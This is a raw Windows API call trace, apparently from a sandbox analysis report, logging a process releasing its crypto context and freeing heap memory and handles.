PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0230.939] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0230.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0230.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.939] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0230.939] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0230.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0230.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0230.939] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0230.939] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0230.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0230.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.940] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0230.940] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0230.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0230.940] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0230.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0230.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0230.940] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0230.940] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0230.940] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.940] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0230.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0230.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.940] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.940] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0230.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0230.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.940] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.941] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0230.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0230.941] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.941] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0230.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0230.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.941] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0230.941] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.941] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0230.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.941] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0230.941] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0230.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0230.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.941] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0230.942] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0230.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0230.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0230.942] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0230.942] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.942] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0230.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.942] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0230.942] FreeLibrary (hLibModule=0x756e0000) returned 1 [0230.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0230.943] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0230.943] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0230.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0230.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0230.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0230.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0230.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0230.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0230.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0230.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0230.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0230.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0230.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0230.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0230.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0230.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0230.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0230.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0230.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0230.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.944] CloseHandle (hObject=0x2d0) returned 1 [0230.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0230.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0230.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0230.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0230.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0230.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0230.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0230.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0230.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0230.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0230.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0230.946] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0230.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0230.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0230.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0230.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0230.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0230.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0230.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0230.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0230.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0230.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0230.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0230.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0230.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0230.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0230.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.947] CloseHandle (hObject=0x2a0) returned 1 [0230.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0230.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0230.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0230.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0230.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0230.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0230.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0230.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0230.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0230.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0230.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0230.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0230.951] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0230.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0230.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0230.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0230.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0230.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0230.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0230.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0230.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0230.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0230.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0230.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0230.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0230.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0230.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0230.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9e0 | out: hHeap=0x970000) returned 1 [0230.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faf8 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa80 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8f0 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f990 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fad0 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faa8 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f850 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0230.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa30 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa08 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa58 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8a0 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f968 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0230.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0230.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0230.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0230.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0230.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0230.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0230.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0230.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 